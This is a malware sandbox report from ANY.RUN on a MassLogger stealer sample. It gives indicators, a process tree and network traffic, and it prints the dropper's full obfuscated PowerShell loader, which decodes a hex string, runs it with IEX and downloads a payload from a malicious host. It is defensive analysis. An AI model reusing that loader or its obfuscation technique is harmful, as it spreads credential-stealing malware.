analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

5b0ef8889ea62cc799bbf224737f8bdc02f48ca57de3856fadc7dfd57841d1c1.zip

Full analysis: https://app.any.run/tasks/e4cd2927-9919-479c-9a8e-f86b10fe0324
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: September 30, 2020, 12:43:26
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
evasion
trojan
masslogger
stealer
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

0EA4D32F8715D1E94EE2F1A34B3E4CE6

SHA1:

ACC93E6E1217A061EFFCE9F23716152A6B8742AA

SHA256:

2C1B1A13273B72D19EC11854B0AD24F860B98754D2B1578DD79D815EB64A29BF

SSDEEP:

48:97pGVFyTLUhKLrZu+dROEdpXvGROnVKJNeXr+HmGU:fGnyTghKLGEdpORzeXrbGU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • MASSLOGGER was detected

      • InstallUtil.exe (PID: 1736)

    • Actions looks like stealing of personal data

      • InstallUtil.exe (PID: 1736)

  • SUSPICIOUS

    • Executed via WMI

      • PoWershell.exe (PID: 2744)

    • PowerShell script executed

      • PoWershell.exe (PID: 2744)

    • Creates files in the user directory

      • PoWershell.exe (PID: 2744)

    • Reads Environment values

      • InstallUtil.exe (PID: 1736)

    • Checks for external IP

      • InstallUtil.exe (PID: 1736)

    • Checks supported languages

      • InstallUtil.exe (PID: 1736)

  • INFO

    • Manual execution by user

      • explorer.exe (PID: 3316)
      • WScript.exe (PID: 2444)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0003
ZipCompression: Unknown (99)
ZipModifyDate: 2020:09:30 10:08:16
ZipCRC: 0x3dc754c9
ZipCompressedSize: 1372
ZipUncompressedSize: 3441
ZipFileName: 5b0ef8889ea62cc799bbf224737f8bdc02f48ca57de3856fadc7dfd57841d1c1.js
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
5
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs wscript.exe no specs powershell.exe explorer.exe no specs #MASSLOGGER installutil.exe

Process information

PID
CMD
Path
Indicators
Parent process
2124"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\5b0ef8889ea62cc799bbf224737f8bdc02f48ca57de3856fadc7dfd57841d1c1.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
2444"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\5b0ef8889ea62cc799bbf224737f8bdc02f48ca57de3856fadc7dfd57841d1c1.js" C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2744PoWershell -ExecutionPolicy Bypass $CFKOQ='D4#C7#72#72#02#E6#96#F6#A6#D2#02#37#27#16#86#34#96#96#36#37#16#42#02#D3#76#E6#96#27#47#35#96#96#36#37#16#42#B3#D7#22#F5#42#87#03#22#D5#56#47#97#26#B5#D5#27#16#86#36#B5#B7#02#47#36#56#A6#26#F4#D2#86#36#16#54#27#F6#64#C7#02#72#D2#72#02#47#96#C6#07#37#D2#02#67#D6#42#02#D3#37#27#16#86#34#96#96#36#37#16#42#B3#92#72#76#07#A6#E2#93#15#F2#27#76#E2#47#56#E6#E2#07#56#47#37#47#87#56#E6#E2#77#77#77#F2#F2#A3#07#47#47#86#72#C2#46#F6#86#47#56#D4#A3#A3#D5#56#07#97#45#C6#C6#16#34#E2#36#96#37#16#24#C6#16#57#37#96#65#E2#47#66#F6#37#F6#27#36#96#D4#B5#C2#72#76#E6#96#27#47#35#46#16#F6#C6#E6#77#F6#44#72#C2#97#47#47#42#82#56#D6#16#E6#97#24#C6#C6#16#34#A3#A3#D5#E6#F6#96#47#36#16#27#56#47#E6#94#E2#36#96#37#16#24#C6#16#57#37#96#65#E2#47#66#F6#37#F6#27#36#96#D4#B5#02#D3#67#D6#42#B3#92#72#36#96#37#16#24#C6#16#57#37#96#65#E2#47#66#F6#37#F6#27#36#96#D4#72#82#56#D6#16#E4#C6#16#96#47#27#16#05#86#47#96#75#46#16#F6#C4#A3#A3#D5#97#C6#26#D6#56#37#37#14#E2#E6#F6#96#47#36#56#C6#66#56#25#E2#D6#56#47#37#97#35#B5#02#D5#46#96#F6#67#B5#B3#D4#C7#72#92#47#E6#56#72#B2#72#96#C6#34#26#72#B2#72#56#75#E2#47#72#B2#72#56#E4#02#47#36#72#B2#72#56#A6#26#F4#72#B2#72#D2#77#56#E4#82#72#D3#97#47#47#42#B3#23#23#07#42#02#D3#02#C6#F6#36#F6#47#F6#27#05#97#47#96#27#57#36#56#35#A3#A3#D5#27#56#76#16#E6#16#D4#47#E6#96#F6#05#56#36#96#67#27#56#35#E2#47#56#E4#E2#D6#56#47#37#97#35#B5#B3#92#23#73#03#33#02#C2#D5#56#07#97#45#C6#F6#36#F6#47#F6#27#05#97#47#96#27#57#36#56#35#E2#47#56#E4#E2#D6#56#47#37#97#35#B5#82#47#36#56#A6#26#F4#F6#45#A3#A3#D5#D6#57#E6#54#B5#02#D3#02#23#23#07#42#B3#92#76#E6#96#07#42#82#02#C6#96#47#E6#57#02#D7#47#56#96#57#15#D2#02#13#02#47#E6#57#F6#36#D2#02#D6#F6#36#E2#56#C6#76#F6#F6#76#02#07#D6#F6#36#D2#02#E6#F6#96#47#36#56#E6#E6#F6#36#D2#47#37#56#47#02#D3#02#76#E6#96#07#42#B7#02#F6#46#B3#56#E6#F6#26#45#42#02#D4#02#C6#16#37#B3#92#72#94#72#C2#72#E3#72#82#56#36#16#C6#07#56#27#E2#72#85#54#E3#72#D3#56#E6#F6#26#45#42';$text =$CFKOQ.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('#') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`XC:\Windows\System32\WindowsPowerShell\v1.0\PoWershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3316"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1736"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PoWershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
.NET Framework installation utility
Version:
4.7.3062.0 built by: NET472REL1
Total events
836
Read events
734
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
2744PoWershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\707LVTS3VHYKFEXGVJNZ.temp
MD5:
SHA256:
2124WinRAR.exeC:\Users\admin\Desktop\5b0ef8889ea62cc799bbf224737f8bdc02f48ca57de3856fadc7dfd57841d1c1.jstext
MD5:5CD316FA7B727045FA5A025B61BF189A
SHA256:5B0EF8889EA62CC799BBF224737F8BDC02F48CA57DE3856FADC7DFD57841D1C1
2744PoWershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1b150b.TMPbinary
MD5:36FE326E12493E805B62142553A1E43C
SHA256:3DD6ACC81930940EC26CE9794D473AC8869FCDB0D48BC71A20C27D80FF693B9F
2744PoWershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:36FE326E12493E805B62142553A1E43C
SHA256:3DD6ACC81930940EC26CE9794D473AC8869FCDB0D48BC71A20C27D80FF693B9F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2744
PoWershell.exe
GET
301
5.189.152.112:80
http://www.nextstep.net.gr/Q9.jpg
DE
html
306 b
malicious
2744
PoWershell.exe
GET
200
5.189.152.112:80
http://nextstep.net.gr/Q9.jpg
DE
text
2.44 Mb
malicious
1736
InstallUtil.exe
GET
200
23.21.109.69:80
http://api.ipify.org/
US
text
14 b
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2744
PoWershell.exe
5.189.152.112:80
www.nextstep.net.gr
Contabo GmbH
DE
malicious
1736
InstallUtil.exe
94.127.7.174:21
milebgd.mycpanel.rs
Serbia BroadBand-Srpske Kablovske mreze d.o.o.
RS
malicious
1736
InstallUtil.exe
23.21.109.69:80
api.ipify.org
Amazon.com, Inc.
US
shared
94.127.7.174:39155
milebgd.mycpanel.rs
Serbia BroadBand-Srpske Kablovske mreze d.o.o.
RS
malicious

DNS requests

Domain
IP
Reputation
google.com
  • 172.217.22.110
whitelisted
www.nextstep.net.gr
  • 5.189.152.112
malicious
nextstep.net.gr
  • 5.189.152.112
malicious
api.ipify.org
  • 23.21.109.69
  • 54.225.66.103
  • 23.21.126.66
  • 50.19.252.36
  • 174.129.214.20
  • 54.235.98.120
  • 54.235.169.38
  • 54.225.195.221
shared
milebgd.mycpanel.rs
  • 94.127.7.174
malicious

Threats

PID
Process
Class
Message
2744
PoWershell.exe
A Network Trojan was detected
SUSPICIOUS [PTsecurity] HEX Encoded Payload
1736
InstallUtil.exe
Misc activity
SUSPICIOUS [PTsecurity] External IP Lookup (possible MassLogger)
1736
InstallUtil.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup api.ipify.org
1736
InstallUtil.exe
Generic Protocol Command Decode
SURICATA Applayer Detect protocol only one direction
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
5b0ef8889ea62cc799bbf224737f8bdc02f48ca57de3856fadc7dfd57841d1c1.zip